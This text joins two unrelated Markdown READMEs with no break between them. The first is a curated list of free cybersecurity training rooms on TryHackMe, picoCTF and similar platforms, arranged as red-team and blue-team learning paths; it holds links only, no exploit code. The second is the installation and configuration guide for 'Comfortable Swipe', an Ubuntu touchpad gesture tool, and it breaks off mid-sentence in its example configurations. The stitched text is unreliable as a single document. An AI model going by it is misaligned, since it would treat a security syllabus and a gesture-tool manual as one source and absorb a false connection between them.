# Awesome Cyber Security University [![Awesome](https://awesome.re/badge.svg)](https://awesome.re) > A curated list of awesome and free educational resources that focuses on learn by doing. <div align="center"> <a href="https://brootware.github.io/awesome-cyber-security-university/"><img src="assets/purpleteam.png" width="250"/></a> <br/> <i>Because education should be free.</i> <br/> <a href="https://brootware.github.io/awesome-cyber-security-university/"><img src="https://visitor-badge.glitch.me/badge?page_id=brootware.cyber-security-university&right_color=blue" /></a> </div> ## Contents * [About](#about) * [Introduction and Pre-Security](#introduction-and-pre-security) - (Completed/In Progress) * [Free Beginner Red Team Path](#free-beginner-red-team-path) - (Add your badge here. The badge code is hidden in this repo) * [Free Beginner Blue Team Path](#free-beginner-blue-team-path) - (Add your badge here. The badge code is hidden in this repo) * [Bonus CTF practice and Latest CVEs](#bonus-ctf-practice-and-latest-cves) - (Completed/In Progress) * [Bonus Windows](#bonus-windows) - (Completed/In Progress) * [Extremely Hard Rooms to do](#extremely-hard-rooms-to-do) - (Completed/In Progress) <!-- | Paths | Completion | | -------------------------------- | ---------------------| |[Introduction and Pre-Security](#-introduction-and-pre-security) |(Completed/In Progress) | |[Free Beginner Red Team Path](#-free-beginner-red-team-path) |(Add your badge here. Badge code is hidden in this repo) | |[Free Beginner Blue Team Path](#-free-beginner-blue-team-path) |(Add your badge here. Badge code is hidden in this repo) | |[Bonus CTF practice & Latest CVEs](#-bonus-ctf-practice-and-latest-cves)|(Completed/In Progress)| |[Bonus Windows](#-bonus-windows)|(Completed/In Progress)| |[Extremely Hard Rooms to do](#-extremely-hard-rooms-to-do) |(Completed/In Progress) | --> ## About Cyber Security University is A curated list of awesome and free educational resources that focus on learning by doing. There are 6 parts to this. Introduction and Pre-security, Free Beginner Red Team Path, Free Beginner Blue Team Path, Bonus practices/latest CVEs and Extremely Hard rooms to do. The tasks are linear in nature of the difficulty. So it's recommended to do it in order. But you can still jump around and skip some rooms If you find that you are already familiar with the concepts. <!--lint disable double-link--> As you go through the curriculum, you will find completion badges that are hidden within this [`README.md`](https://github.com/brootware/Cyber-Security-University/blob/main/README.md) for both red and blue team path completion badges. You can copy the HTML code for them and add it to the content page below once you have completed them. <!--lint disable double-link--> [↑](#contents) <!--lint enable double-link--> ## Contributing Pull requests are welcome with the condition that the resource should be free! Please read the [contribution guide in the wiki](https://github.com/brootware/Cyber-Security-University/wiki) if you wish to add tools or resources. ## Introduction and Pre-Security ### Level 1 - Intro <!--lint disable double-link--> * [OpenVPN](<https://tryhackme.com/room/openvpn>) - Learn how to connect to a virtual private network using OpenVPN.<!--lint enable double-link--> * [Welcome](<https://tryhackme.com/jr/welcome>) - Learn how to use a TryHackMe room to start your upskilling in cyber security. * [Intro to Researching](<https://tryhackme.com/room/introtoresearch>) - A brief introduction to research skills for pentesting. * [Linux Fundamentals 1](<https://tryhackme.com/room/linuxfundamentalspart1>) - Embark on the journey of learning the fundamentals of Linux. Learn to run some of the first essential commands on an interactive terminal. * [Linux Fundamentals 2](<https://tryhackme.com/room/linuxfundamentalspart2>) - Embark on the journey of learning the fundamentals of Linux. Learn to run some of the first essential commands on an interactive terminal. * [Linux Fundamentals 3](<https://tryhackme.com/room/linuxfundamentalspart3>) - Embark on the journey of learning the fundamentals of Linux. Learn to run some of the first essential commands on an interactive terminal. * [Pentesting fundamentals](<https://tryhackme.com/room/pentestingfundamentals>) - Fundamentals of penetration testing. * [Principles of security](<https://tryhackme.com/room/principlesofsecurity>) - Principles of security. * [Red Team Engagements](<https://tryhackme.com/room/redteamengagements>) - Intro to red team engagements. * [Hip Flask](https://tryhackme.com/room/hipflask) - An in-depth walkthrough covering pentest methodology against a vulnerable server. <!-- markdownlint-disable MD036 --> **Introductory CTFs to get your feet wet**<!-- markdownlint-enable MD036 --> * [Google Dorking](<https://tryhackme.com/room/googledorking>) - Explaining how Search Engines work and leveraging them into finding hidden content! * [Osint](<https://tryhackme.com/room/ohsint>) - Intro to Open Source Intelligence. * [Shodan.io](<https://tryhackme.com/room/shodan>) - Learn about Shodan.io and how to use it for device enumeration. <!--lint disable double-link--> [↑](#contents)<!--lint enable double-link--> ## Free Beginner Red Team Path ### Level 2 - Tooling * [Tmux](<https://tryhackme.com/room/rptmux>) - Learn to use tmux, one of the most powerful multi-tasking tools on linux. * [Nmap](<https://tryhackme.com/room/rpnmap>) - Get experience with Nmap, a powerful network scanning tool. * [Web Scanning](<https://tryhackme.com/room/rpwebscanning>) - Learn the basics of automated web scanning. * [Sublist3r](<https://tryhackme.com/room/rpsublist3r>) - Learn how to find subdomains with Sublist3r. * [Metasploit](<https://tryhackme.com/room/rpmetasploit>) - An introduction to the main components of the Metasploit Framework. * [Hydra](<https://tryhackme.com/room/hydra>) - Learn about and use Hydra, a fast network logon cracker, to bruteforce and obtain a website's credentials. * [Linux Privesc](<https://tryhackme.com/room/linuxprivesc>) - Practice your Linux Privilege Escalation skills on an intentionally misconfigured Debian VM with multiple ways to get root! SSH is available. * [Red Team Fundamentals](<https://tryhackme.com/room/redteamfundamentals>) - Learn about the basics of a red engagement, the main components and stakeholders involved, and how red teaming differs from other cyber security engagements. * [Red Team Recon](<https://tryhackme.com/room/redteamrecon>) - Learn how to use DNS, advanced searching, Recon-ng, and Maltego to collect information about your target. <!-- markdownlint-disable MD036 --> **Red Team Intro CTFs**<!-- markdownlint-enable MD036 --> * [Vulnversity](<https://tryhackme.com/room/vulnversity>) - Learn about active recon, web app attacks and privilege escalation. * [Blue](<https://tryhackme.com/room/blue>) - Deploy & hack into a Windows machine, leveraging common misconfigurations issues. * [Simple CTF](<https://tryhackme.com/room/easyctf>) - Beginner level CTF. * [Bounty Hacker](<https://tryhackme.com/room/cowboyhacker>) - A space cowboy-themed boot to root machine. <!--lint disable double-link--> [↑](#contents)<!--lint enable double-link--> ### Level 3 - Crypto & Hashes with CTF practice * [Crack the hash](<https://tryhackme.com/room/crackthehash>) - Cracking hash challenges. * [Agent Sudo](<https://tryhackme.com/room/agentsudoctf>) - You found a secret server located under the deep sea. Your task is to hack inside the server and reveal the truth. * [The Cod Caper](<https://tryhackme.com/room/thecodcaper>) - A guided room taking you through infiltrating and exploiting a Linux system. * [Ice](<https://tryhackme.com/room/ice>) - Deploy & hack into a Windows machine, exploiting a very poorly secured media server. * [Lazy Admin](<https://tryhackme.com/room/lazyadmin>) - Easy linux machine to practice your skills. * [Basic Pentesting](<https://tryhackme.com/room/basicpentestingjt>) - This is a machine that allows you to practice web app hacking and privilege escalation. * [Bypassing UAC](https://tryhackme.com/room/bypassinguac) - Learn common ways to bypass User Account Control (UAC) in Windows hosts. <!--lint disable double-link--> [↑](#contents)<!--lint enable double-link--> ### Level 4 - Web * [OWASP top 10](<https://tryhackme.com/room/owasptop10>) - Learn about and exploit each of the OWASP Top 10 vulnerabilities; the 10 most critical web security risks. * [Inclusion](<https://tryhackme.com/room/inclusion>) - A beginner-level LFI challenge. * [Injection](<https://tryhackme.com/room/injection>) - Walkthrough of OS Command Injection. Demonstrate OS Command Injection and explain how to prevent it on your servers. * [Juiceshop](<https://tryhackme.com/room/owaspjuiceshop>) - This room uses the OWASP juice shop vulnerable web application to learn how to identify and exploit common web application vulnerabilities. * [Overpass](<https://tryhackme.com/room/overpass>) - What happens when some broke CompSci students make a password manager. * [Year of the Rabbit](<https://tryhackme.com/room/yearoftherabbit>) - Can you hack into the Year of the Rabbit box without falling down a hole. * [DevelPy](<https://tryhackme.com/room/bsidesgtdevelpy>) - Boot2root machine for FIT and bsides Guatemala CTF. * [Jack of all trades](<https://tryhackme.com/room/jackofalltrades>) - Boot-to-root originally designed for Securi-Tay 2020. * [Bolt](https://tryhackme.com/room/bolt) - Bolt themed machine to root into. <!--lint disable double-link--> [↑](#contents)<!--lint enable double-link--> ### Level 5 - Reverse Engineering & Pwn * [Intro to x86 64](<https://tryhackme.com/room/introtox8664>) - This room teaches the basics of x86-64 assembly language. * [CC Ghidra](<https://tryhackme.com/room/ccghidra>) - This room teaches the basics of ghidra. * [CC Radare2](<https://tryhackme.com/room/ccradare2>) - This room teaches the basics of radare2. * [Reverse Engineering](<https://tryhackme.com/room/reverseengineering>) - This room focuses on teaching the basics of assembly through reverse engineering. * [Reversing ELF](<https://tryhackme.com/room/reverselfiles>) - Room for beginner Reverse Engineering CTF players. * [Dumping Router Firmware](<https://tryhackme.com/room/rfirmware>) - Reverse engineering router firmware. * [Intro to pwntools](<https://tryhackme.com/room/introtopwntools>) - Introduction to popular pwn tools framework. * [Pwnkit: CVE-2021-4034](<https://tryhackme.com/room/pwnkit>) - Interactive lab for exploiting and remediating Pwnkit (CVE-2021-4034) in the Polkit package. <!--lint disable double-link--> [↑](#contents)<!--lint enable double-link--> ### Level 6 - PrivEsc * [Sudo Security Bypass](<https://tryhackme.com/room/sudovulnsbypass>) - A tutorial room exploring CVE-2019-14287 in the Unix Sudo Program. Room One in the SudoVulns Series. * [Sudo Buffer Overflow](<https://tryhackme.com/room/sudovulnsbof>) - A tutorial room exploring CVE-2019-18634 in the Unix Sudo Program. Room Two in the SudoVulns Series. * [Windows Privesc Arena](<https://tryhackme.com/room/windowsprivescarena>) - Students will learn how to escalate privileges using a very vulnerable Windows 7 VM. * [Linux Privesc Arena](<https://tryhackme.com/room/linuxprivescarena>) - Students will learn how to escalate privileges using a very vulnerable Linux VM. * [Windows Privesc](<https://tryhackme.com/room/windows10privesc>) - Students will learn how to escalate privileges using a very vulnerable Windows 7 VM. * [Blaster](<https://tryhackme.com/room/blaster>) - Metasploit Framework to get a foothold. * [Ignite](<https://tryhackme.com/room/ignite>) - A new start-up has a few security issues with its web server. * [Kenobi](<https://tryhackme.com/room/kenobi>) - Walkthrough on exploiting a Linux machine. Enumerate Samba for shares, manipulate a vulnerable version of proftpd and escalate your privileges with path variable manipulation. * [Capture the flag](<https://tryhackme.com/room/c4ptur3th3fl4g>) - Another beginner-level CTF challenge. * [Pickle Rick](<https://tryhackme.com/room/picklerick>) - Rick and Morty themed LFI challenge. > Congratulations! If you have finished until here. You deserve a badge! Put this in your writeups or git profile. You can continue doing the below CTFs. <details> <summary>Click here to get your red team badge!</summary> <https://gist.github.com/brootware/e30a10dbccf334eb95da7ea59d6f87fe> </details> <!--lint disable double-link--> [↑](#contents)<!--lint enable double-link--> ## Free Beginner Blue Team Path ### Level 1 - Tools * [Introduction to digital forensics](https://tryhackme.com/room/introdigitalforensics) - Intro to Digital Forensics. * [Windows Fundamentals](<https://tryhackme.com/room/windowsfundamentals1xbx>) - Intro to Windows. * [Nessus](<https://tryhackme.com/room/rpnessusredux>) - Intro to nessus scan. * [Mitre](<https://tryhackme.com/room/mitre>) - Intro to Mitre attack framework. * [IntroSIEM](https://tryhackme.com/room/introtosiem) - Introduction to SIEM. * [Yara](<https://tryhackme.com/room/yara>) - Intro to yara for malware analysis. * [OpenVAS](<https://tryhackme.com/room/openvas>) - Intro to openvas. * [Intro to Honeypots](<https://tryhackme.com/room/introductiontohoneypots>) - Intro to honeypots. * [Volatility](<https://tryhackme.com/room/bpvolatility>) - Intro to memory analysis with volatility. * [Red Line](<https://tryhackme.com/room/btredlinejoxr3d>) - Learn how to use Redline to perform memory analysis and scan for IOCs on an endpoint. * [Autopsy](<https://tryhackme.com/room/autopsy2ze0>) - Use Autopsy to investigate artifacts from a disk image. <!--lint disable double-link--> [↑](#contents)<!--lint enable double-link--> ### Level 2 - Security Operations, Incident Response & Threat Hunting * [Investigating Windows](<https://tryhackme.com/room/investigatingwindows>) - Investigating Windows. * [Juicy Details](<https://tryhackme.com/room/juicydetails>) - A popular juice shop has been breached! Analyze the logs to see what had happened. * [Carnage](<https://tryhackme.com/room/c2carnage>) - Apply your analytical skills to analyze the malicious network traffic using Wireshark. * [Squid Game](<https://tryhackme.com/room/squidgameroom>) - Squid game-themed CTF. * [Splunk Boss of the SOC V1](<https://tryhackme.com/room/bpsplunk>) - Part of the Blue Primer series, learn how to use Splunk to search through massive amounts of information. * [Splunk Boss of the SOC V2](<https://cyberdefenders.org/blueteam-ctf-challenges/16>) - Splunk analysis vol 2. * [Splunk Boss of the SOC V3](<https://cyberdefenders.org/blueteam-ctf-challenges/8>) - Splunk analysis vol 3. * [Hunt Conti with Splunk](https://tryhackme.com/room/contiransomwarehgh) - An Exchange server was compromised with ransomware. Use Splunk to investigate how the attackers compromised the server. * [Hunting for Execution Tactic](https://info.cyborgsecurity.com/en-us/threat-hunting-workshop-3) - Join Cyborg Security's expert threat hunters as they dive into the interesting MITRE ATT&CK Tactic of Execution (TA0002). * [Hunting for Credential Access](https://info.cyborgsecurity.com/en-us/threat-hunting-workshop-5) - Join Cyborg Security's expert threat hunters as they dive into the interesting MITRE ATT&CK Tactic of Credential Access (TA0006). * [Hunting for Persistence Access](https://info.cyborgsecurity.com/en-us/threat-hunting-workshop-2) - Join Cyborg Security's team of threat hunting instructors for a fun and hands-on-keyboard threat hunting workshop covering the topic of adversarial persistence (TA0003). * [Hunting for Defense Evation](https://info.cyborgsecurity.com/en-us/threat-hunting-workshop-4) - Join Cyborg Security's expert threat hunters as they dive into the interesting MITRE ATT&CK Tactic of Defense Evasion (TA0005). <!--lint disable double-link--> [↑](#contents) <!--lint enable double-link--> ### Level 3 - Beginner Forensics & Cryptography * [Martryohka doll](<https://play.picoctf.org/practice/challenge/129?category=4&page=1&solved=0>) - Beginner file analysis challenge. * [The Glory of the Garden](<https://play.picoctf.org/practice/challenge/44?category=4&page=1&solved=0>) - Beginner image analysis challenge. * [Packets Primer](<https://play.picoctf.org/practice/challenge/286?category=4&page=2&solved=0>) - Beginner packet analysis challenge. * [Wireshark doo doo doo](<https://play.picoctf.org/practice/challenge/115?category=4&page=1&solved=0>) - Beginner packet analysis challenge. * [Wireshark two two two](<https://play.picoctf.org/practice/challenge/110?category=4&page=1&solved=0>) - Beginner packet analysis challenge. * [Trivial flag transfer protocol](<https://play.picoctf.org/practice/challenge/103?category=4&page=1&solved=0>) - Beginner packet analysis challenge. * [What Lies within](<https://play.picoctf.org/practice/challenge/74?category=4&page=2&solved=0>) - Beginner decoding analysis challenge. * [Illumination](<https://app.hackthebox.com/challenges/illumination>) - Medium level forensics challenge. * [Emo](<https://app.hackthebox.com/challenges/emo>) - Medium level forensics challenge. * [Obsecure](<https://app.hackthebox.com/challenges/obscure>) - Medium level forensics challenge. * [Bucket - Cloud Security Forensics](<https://cyberdefenders.org/blueteam-ctf-challenges/84>) - Medium level cloud security challenge. * [Introduction to Cryptohack](<https://cryptohack.org/courses/intro/course_details/>) - Medium level cryptography challenge. <!--lint disable double-link--> [↑](#contents)<!--lint enable double-link--> ### Level 4 - Memory & Disk Forensics * [Sleuthkit Intro](<https://play.picoctf.org/practice/challenge/301?category=4&page=2&solved=0>) - Medium level disk forensics challenge. * [Reminiscent](<https://app.hackthebox.com/challenges/reminiscent>) - Medium level disk forensics challenge. * [Hunter - Windows Disk Image Forensics](<https://cyberdefenders.org/blueteam-ctf-challenges/32>) - Medium level disk forensics challenge. * [Spotlight - Mac Disk Image Forensics](<https://cyberdefenders.org/blueteam-ctf-challenges/34>) - Medium level disk forensics challenge. * [Ulysses - Linux Disk Image Forensics](<https://cyberdefenders.org/blueteam-ctf-challenges/41>) - Medium level disk forensics challenge. * [Banking Troubles - Windows Memory Image Forensics](<https://cyberdefenders.org/blueteam-ctf-challenges/43>) - Medium level memory forensics challenge. * [Detect Log4J](<https://cyberdefenders.org/blueteam-ctf-challenges/86>) - Medium level disk forensics challenge. <!--lint disable double-link--> [↑](#contents)<!--lint enable double-link--> ### Level 5 - Malware and Reverse Engineering * [History of Malware](<https://tryhackme.com/room/historyofmalware>) - Intro to malware history. * [Malware Introduction](<https://tryhackme.com/room/malmalintroductory>) - Intro to malware. * [Basic Malware Reverse Engineering](<https://tryhackme.com/room/basicmalwarere>) - Intro to malware RE. * [Intro Windows Reversing](<https://tryhackme.com/room/windowsreversingintro>) - Intro to Windows RE. * [Windows x64 Assembly](<https://tryhackme.com/room/win64assembly>) - Introduction to x64 Assembly on Windows. * [JVM reverse engineering](<https://tryhackme.com/room/jvmreverseengineering>) - Learn Reverse Engineering for Java Virtual Machine bytecode. * [Get PDF (Malicious Document)](<https://cyberdefenders.org/blueteam-ctf-challenges/47>) - Reversing PDF malware. > Congratulations! If you have finished until here. You deserve a badge! Put this in your writeups or git profile. You can continue doing the below CTFs. <details> <summary>Click here to get your blue team badge!</summary> <https://gist.github.com/brootware/62b76a84aaa8d6f55c82f6f329ad6d2d> </details> <!--lint disable double-link--> [↑](#contents)<!--lint enable double-link--> ## Bonus CTF practice and Latest CVEs * [Bandit](<https://overthewire.org/wargames/bandit/>) - Aimed at absolute beginners and teaches the basics of remote server access. * [Natas](<https://overthewire.org/wargames/natas/>) - Teaches the basics of serverside web-security. * [Post Exploitation Basics](<https://tryhackme.com/room/postexploit>) - Learn the basics of post-exploitation and maintaining access with mimikatz, bloodhound, powerview and msfvenom. * [Smag Grotto](<https://tryhackme.com/room/smaggrotto>) - An obsecure boot to root machine. * [Dogcat](<https://tryhackme.com/room/dogcat>) - I made a website where you can look at pictures of dogs and/or cats! Exploit a PHP application via LFI and break out of a docker container. * [Buffer Overflow Prep](<https://tryhackme.com/room/bufferoverflowprep>) - Practice stack-based buffer overflows. * [Break out the cage](<https://tryhackme.com/room/breakoutthecage1>) - Help Cage bring back his acting career and investigate the nefarious going on of his agent. * [Lian Yu](<https://tryhackme.com/room/lianyu>) - A beginner-level security challenge. * [Insecure Kubernetes](<https://tryhackme.com/room/insekube>) - Exploiting Kubernetes by leveraging a Grafana LFI vulnerability. * [The Great Escape (docker)](<https://tryhackme.com/room/thegreatescape>) - Escaping docker container. * [Solr Exploiting Log4j](<https://tryhackme.com/room/solar>) - Explore CVE-2021-44228, a vulnerability in log4j affecting almost all software under the sun. * [Spring4Shell](<https://tryhackme.com/room/spring4shell>) - Interactive lab for exploiting Spring4Shell (CVE-2022-22965) in the Java Spring Framework. * [Most Recent threats](<https://tryhackme.com/module/recent-threats>) - Learn about the latest industry threats. Get hands-on experience identifying, exploiting, and mitigating critical vulnerabilities. <!--lint disable double-link--> [↑](#contents)<!--lint enable double-link--> ## Bonus Windows * [Attacktive Directory](<https://tryhackme.com/room/attacktivedirectory>) - Learn about 99% of Corporate networks that run off of AD. * [Retro](<https://tryhackme.com/room/retro>) - Breaking out of the retro-themed box. * [Blue Print](<https://tryhackme.com/room/blueprint>) - Hack into this Windows machine and escalate your privileges to Administrator. * [Anthem](<https://tryhackme.com/room/anthem>) - Exploit a Windows machine in this beginner-level challenge. * [Relevant](<https://tryhackme.com/room/relevant>) - Penetration Testing Challenge. <!--lint disable double-link--> [↑](#contents)<!--lint enable double-link--> ## Extremely Hard Rooms to do * [Ra](<https://tryhackme.com/room/ra>) - You have found WindCorp's internal network and their Domain Controller. Pwn the network. * [CCT2019](<https://tryhackme.com/room/cct2019>) - Legacy challenges from the US Navy Cyber Competition Team 2019 Assessment sponsored by US TENTH Fleet. * [Theseus](<https://tryhackme.com/room/theseus>) - The first installment of the SuitGuy series of very hard challenges. * [IronCorp](<https://tryhackme.com/room/ironcorp>) - Get access to Iron Corp's system. * [Carpe Diem 1](<https://tryhackme.com/room/carpediem1>) - Recover your client's encrypted files before the ransomware timer runs out. * [Borderlands](<https://tryhackme.com/room/borderlands>) - Compromise a perimeter host and pivot through this network. * [Jeff](<https://tryhackme.com/room/jeff>) - Hack into Jeff's web server. * [Year of the Owl](https://tryhackme.com/room/yearoftheowl) - Owl-themed boot to root machine. * [Anonymous Playground](<https://tryhackme.com/room/anonymousplayground>) - Want to become part of Anonymous? They have a challenge for you. * [EnterPrize](<https://tryhackme.com/room/enterprize>) - Enterprise-themed network to hack into. * [Racetrack Bank](<https://tryhackme.com/room/racetrackbank>) - It's time for another heist. * [Python Playground](<https://tryhackme.com/room/pythonplayground>) - Use python to pwn this room. <!--lint disable double-link--> [↑](#contents)<!--lint enable double-link--> ## Footnotes **Inspired by** <https://skerritt.blog/free-rooms/> ### Contributors & stargazers ✨ <!-- ALL-CONTRIBUTORS-BADGE:START - Do not remove or modify this section --> [![All Contributors](https://img.shields.io/badge/all_contributors-2-orange.svg?style=flat-square)](#contributors-) <!-- ALL-CONTRIBUTORS-BADGE:END --> Special thanks to everyone who forked or starred the repository ❤️ [![Stargazers repo roster for @brootware/awesome-cyber-security-university](https://reporoster.com/stars/dark/brootware/awesome-cyber-security-university)](https://github.com/brootware/awesome-cyber-security-university/stargazers) [![Forkers repo roster for @brootware/awesome-cyber-security-university](https://reporoster.com/forks/dark/brootware/awesome-cyber-security-university)](https://github.com/brootware/awesome-cyber-security-university/network/members) Thanks goes to these wonderful people ([emoji key](https://allcontributors.org/docs/en/emoji-key)): <!-- ALL-CONTRIBUTORS-LIST:START - Do not remove or modify this section --> <!-- prettier-ignore-start --> <!-- markdownlint-disable --> <table> <tr> <td align="center"><a href="https://brootware.github.io"><img src="https://avatars.githubusercontent.com/u/7734956?v=4?s=100" width="100px;" alt=""/><br /><sub><b>Oaker Min</b></sub></a><br /><a href="#infra-brootware" title="Infrastructure (Hosting, Build-Tools, etc)">🚇</a> <a href="#maintenance-brootware" title="Maintenance">🚧</a> <a href="https://github.com/brootware/cyber-security-university/commits?author=brootware" title="Documentation">📖</a> <a href="https://github.com/brootware/cyber-security-university/commits?author=brootware" title="Code">💻</a></td> <td align="center"><a href="https://lucidcode.com"><img src="https://avatars.githubusercontent.com/u/1631870?v=4?s=100" width="100px;" alt=""/><br /><sub><b>Michael Paul Coder</b></sub></a><br /><a href="https://github.com/brootware/cyber-security-university/commits?author=IAmCoder" title="Documentation">📖</a></td> </tr> </table> <!-- markdownlint-restore --> <!-- prettier-ignore-end --> <!-- ALL-CONTRIBUTORS-LIST:END --> This project follows the [all-contributors](https://github.com/all-contributors/all-contributors) specification. Contributions of any kind are welcome! <!--lint disable double-link--> [↑](#contents)<!--lint enable double-link-->
# Comfortable Swipe (Ubuntu) [![comfortable-swipe version](https://img.shields.io/github/release/Hikari9/comfortable-swipe.svg?label=comfortable-swipe&color=orange)](https://github.com/Hikari9/comfortable-swipe/releases) [![License: GPL v3](https://img.shields.io/badge/License-GPL%20v3-blue.svg)](https://www.gnu.org/licenses/gpl-3.0) Comfortable, seamless, and fast 3-finger (and 4-finger) touchpad swipe gestures for Ubuntu 14.04 LTS and beyond. May work for other Linux distros that support `libinput`. > **_New in Version 1.1.0_**: Added mouse gestures, see [#mouse-gestures-experimental](#mouse-gestures-experimental) > **_New in Version 1.2.0_**: Autostart now switched ON by default ## Installation 1. Install git and g++ &geq; 7.5 ```bash sudo apt install git g++ ``` 1. Install libinput-tools and C libraries ```bash sudo apt install libinput-tools libinih-dev libxdo-dev ``` 1. Clone this repository ```bash git clone https://github.com/Hikari9/comfortable-swipe.git --depth 1 cd comfortable-swipe ``` 1. Install ```bash bash install ``` 1. You may delete the downloaded `comfortable-swipe` folder after installation. ## How to Run 1. You'll need some group permissions to read touchpad input data. Run ```bash sudo gpasswd -a "$USER" "$(ls -l /dev/input/event* | awk '{print $4}' | head --line=1)" ``` 1. **_Important_**: After inputing your `sudo` password, log out then log back in 1. Start the Program ``` comfortable-swipe start ``` You will see this output: ``` $ comfortable-swipe start Comfortable swipe is RUNNING in the background ``` 1. (Optional) Toggle autostart ```bash comfortable-swipe autostart on ``` 1. (Optional) Stop the Program ``` comfortable-swipe stop ``` 1. (Optional) See program status ```bash comfortable-swipe status ``` Example: ``` $ comfortable-swipe status Autostart is ON Program is RUNNING -------------------- Configuration: /home/user/.config/comfortable-swipe.conf left3 is VALID (ctrl+super+Right) left4 is VALID (ctrl+super+shift+Right) right3 is VALID (ctrl+super+Left) right4 is VALID (ctrl+super+shift+Left) up3 is VALID (ctrl+F12) up4 is VALID (super+d) down3 is VALID (ctrl+F12) down4 is VALID (super+d) threshold is VALID (1.0) mouse3 is NOTSET mouse4 is NOTSET ``` 1. (Optional) Get config ``` comfortable-swipe <PROPERTY> ``` ```bash comfortable-swipe left3 comfortable-swipe left4 comfortable-swipe right3 comfortable-swipe right4 comfortable-swipe up3 comfortable-swipe up4 comfortable-swipe down3 comfortable-swipe down4 comfortable-swipe threshold comfortable-swipe mouse3 comfortable-swipe mouse4 ``` 1. (Optional) Set config ```bash comfortable-swipe <PROPERTY> [=] <VALUES> ``` ```bash comfortable-swipe left3 = super+Right comfortable-swipe right3 = super+Left comfortable-swipe right4 = ctrl+alt+Left comfortable-swipe down4 = super+d comfortable-swipe up3 = ctrl+shift+Up ``` <details> <summary><b>Other Commands</b></summary> 1. All Configuration commands ```bash comfortable-swipe config list comfortable-swipe config get <PROPERTY> comfortable-swipe config set <PROPERTY> [=] <VALUE> comfortable-swipe config path comfortable-swipe config keys ``` 1. Help and Version ```bash comfortable-swipe --version comfortable-swipe --help ``` 1. Autostart commands ```bash comfortable-swipe autostart on comfortable-swipe autostart off comfortable-swipe autostart toggle comfortable-swipe autostart status comfortable-swipe autostart path ``` 1. Show output with `--attach` Example output of 3-finger left, 4-finger left, 3-finger right, 3-finger up: ```bash $ comfortable-swipe start --attach SWIPE left3 SWIPE left4 SWIPE right3 SWIPE up3 ... ``` 1. Test output with `--bare` to attach without actually swiping ```bash $ comfortable-swipe start --bare SWIPE left3 SWIPE left4 SWIPE right3 SWIPE up3 ... ``` 1. Debug ```bash $ comfortable-swipe debug ... -event9 DEVICE_ADDED TouchPad seat0 default group7 cap:pg size 70x50mm tap(dl off) left scroll-nat scroll-2fg-edge click-buttonareas-clickfinger dwt-on ... event9 GESTURE_SWIPE_BEGIN +2.03s 3 event9 GESTURE_SWIPE_UPDATE +2.03s 3 -9.95/ 2.64 (-26.90/ 7.12 unaccelerated) event9 GESTURE_SWIPE_UPDATE +2.03s 3 -10.44/ 3.19 (-28.22/ 8.62 unaccelerated) event9 GESTURE_SWIPE_UPDATE +2.04s 3 -9.71/ 2.64 (-26.25/ 7.12 unaccelerated) event9 GESTURE_SWIPE_UPDATE +2.05s 3 -8.98/ 2.64 (-24.28/ 7.12 unaccelerated) event9 GESTURE_SWIPE_UPDATE +2.06s 3 -7.40/ 2.36 (-20.01/ 6.37 unaccelerated) event9 GESTURE_SWIPE_UPDATE +2.06s 3 -6.31/ 2.50 (-17.06/ 6.75 unaccelerated) event9 GESTURE_SWIPE_UPDATE +2.07s 3 -5.34/ 1.80 (-14.44/ 4.87 unaccelerated) event9 GESTURE_SWIPE_UPDATE +2.08s 3 -4.61/ 2.08 (-12.47/ 5.62 unaccelerated) event9 GESTURE_SWIPE_UPDATE +2.09s 3 -4.49/ 1.53 (-12.14/ 4.12 unaccelerated) event9 GESTURE_SWIPE_UPDATE +2.09s 3 -4.01/ 1.25 (-10.83/ 3.37 unaccelerated) event9 GESTURE_SWIPE_UPDATE +2.10s 3 -4.13/ 0.42 (-11.15/ 1.12 unaccelerated) event9 GESTURE_SWIPE_END +2.11s 3 ... ``` </details> ## Gesture Configurations The default configuration file is located at `~/.config/comfortable-swipe.conf`. Comfortable swipe makes use of **keyboard shortcuts** to perform swipes, through `xdotool`. Set a property directly with: ``` comfortable-swipe <PROPERTY> [=] <VALUE> ``` Or edit the configuration file manually: ``` gedit ~/.config/comfortable-swipe.conf ``` After editing, make sure to restart with `comfortable-swipe start`. > **Warning**: For v1.1.0 below, the configuration file is located at > `/usr/local/share/comfortable-swipe/comfortable-swipe.conf` > **Note**: You can locate the absolute path to your configuration by running: `comfortable-swipe config path` ## Configuration Reference | Property | Value | Examples | | --------- | :--------------------------------------------------------------------: | ---------------------------------------------------------------------------------- | | left3 | 3-finger swipe left | ctrl+alt+Right | | left4 | 4-finger swipe left | ctrl+alt+shift+Right | | right3 | 3-finger swipe right | ctrl+alt+Left | | right4 | 4-finger swipe right | ctrl+alt+shift+Left | | up3 | 3-finger swipe up | ctrl+alt+Down | | up4 | 4-finger swipe up | ctrl+alt+shift+Down | | down3 | 3-finger swipe down | ctrl+alt+Up | | down4 | 4-finger swipe down | ctrl+alt+shift+Up | | threshold | mouse movement pixels that trigger a swipe (can be as large as 1000.0) | 0.0 / 240.0 / 1000.0 | | mouse3 | mouses a mouse button when 3 fingers are down | button1 / move / scroll<br> _(see [Mouse Gestures](#mouse-gestures-experimental))_ | | | mouse4 | mouses a mouse button when 4 fingers are down | button1 / move / scroll <br> _(see [Mouse Gestures](#mouse-gestures-experimental)_ | ### Keystrokes Taken from `man xdotool`: > Type a given keystroke. Examples being "alt+r", "Control_L+J", > "ctrl+alt+n", "BackSpace". > > Generally, any valid X Keysym string will work. Multiple keys are > separated by '+'. Aliases exist for "alt", "ctrl", "shift", > "super", and "meta" which all map to Foo_L, such as Alt_L and > Control_L, etc. > > In cases where your keyboard doesn't actually have the key you want > to type, xdotool will automatically find an unused keycode and use > that to type the key. Refer to https://www.linux.org/threads/xdotool-keyboard.10528/ for a complete list of keycodes you can use. - [DEFKEY - All Linux keyboard shortcuts](https://defkey.com/) - [Unity Keyboard Shortcuts](https://cheatography.com/sapemeg/cheat-sheets/ubuntu-unity-16-04/) - [GNOME Keyboard Shortcuts](https://wiki.gnome.org/Design/OS/KeyboardShortcuts) - [KDE Keyboard Shortcuts](https://community.linuxmint.com/tutorial/view/47) - [PopOS Keyboard Shortcuts](https://support.system76.com/articles/pop-keyboard-shortcuts/) ## Known Issues: Pop!_OS 20.04+ Pop!_OS 20.04+ may be sensitive to capitalization (#76, #82). Make sure to capitalize every first letter: ```bash # Pop!_OS comfortable-swipe up3 = Super+Ctrl+Down comfortable-swipe down3 = Super+Ctrl+Up ``` ## Example Configurations This section includes some example configurations which you can use for your swipe experience. 1. Switch workspace (horizontal) ```bash # Ubuntu flavors + GNOME comfortable-swipe left3 = ctrl+alt+Right comfortable-swipe right3 = ctrl+alt+Left ``` 1. Switch workspace (vertical) ```bash # Ubuntu flavors + 